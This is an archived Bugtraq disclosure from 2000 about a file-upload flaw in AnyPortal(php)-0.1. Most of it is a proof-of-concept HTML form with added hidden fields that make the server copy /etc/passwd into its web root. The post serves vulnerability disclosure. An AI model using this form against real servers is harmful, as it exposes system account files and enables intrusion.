Bugtraq mailing list archives
AnyPortal(php)-0.1 Vulnerability
From: zorgon <zorgon () LINUXSTART COM>
Date: Mon, 11 Sep 2000 05:54:33 -0400
======================================================== AnyPortal(php)-0.1 Vulnerability ======================================================== Date: 08/09/2000 Author: zorgon <zorgon () linuxstart com> Web: http://www.nightbird.free.fr Introduction -------------- Secure Reality Pty Ltd. has published the Security Advisory #1 (SRADV00001) (http://www.securityfocus.com/bid/1649) I reproduce this vulnerability with AnyPortal(php)-0.1. Description ------------ We suppose that AnyPortal is installed by defaut. Create a file on your local computer called upload.html (if you want :) with the source code of this page: http://www.victim.com/siteman000510/siteman.php3?A=U&D= Modify this part of code:: <FORM ENCTYPE="multipart/form-data" METHOD="POST" ACTION="/siteman000510/siteman.php3"> DESTINATION DIRECTORY:<B> /</B> <P>PATHNAME OF LOCAL FILE<BR> <INPUT TYPE="HIDDEN" NAME="DIR" VALUE="/"> <INPUT TYPE="HIDDEN" NAME="POSTACTION" VALUE="UPLOAD"> <INPUT SIZE=30 TYPE="FILE" NAME="FN"></P> By: <FORM ENCTYPE="multipart/form-data" METHOD="POST" ACTION="http://www.victim.com/siteman000510/siteman.php3"> DESTINATION DIRECTORY:<B> /</B> <P>PATHNAME OF LOCAL FILE<BR> <INPUT TYPE="HIDDEN" NAME="DIR" VALUE="/"> <INPUT TYPE="HIDDEN" NAME="POSTACTION" VALUE="UPLOAD"> <INPUT SIZE=30 TYPE="FILE" NAME="FN"></P> <INPUT TYPE="HIDDEN" NAME="FN" VALUE="/etc/passwd"></P> <INPUT TYPE="HIDDEN" NAME="FN_name" VALUE="passwd"> Also, you can retrieve the passwd file on the web server. (http://www.victim.com/ here) ================================== zorgon <zorgon () linuxstart com> http://www.nightbird.free.fr ---------------------- Do you do Linux? :) Get your FREE @linuxstart.com email address at: http://www.linuxstart.com
Current thread:
- AnyPortal(php)-0.1 Vulnerability zorgon (Sep 12)